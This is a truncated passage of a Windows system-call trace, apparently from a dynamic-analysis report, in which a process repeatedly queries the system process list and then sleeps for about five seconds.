NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.156] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.163] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.179] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.194] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.210] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.227] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.242] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.257] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.273] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.289] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.304] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.330] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.334] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.351] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.366] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.382] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.398] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.413] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.429] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.444] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.462] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 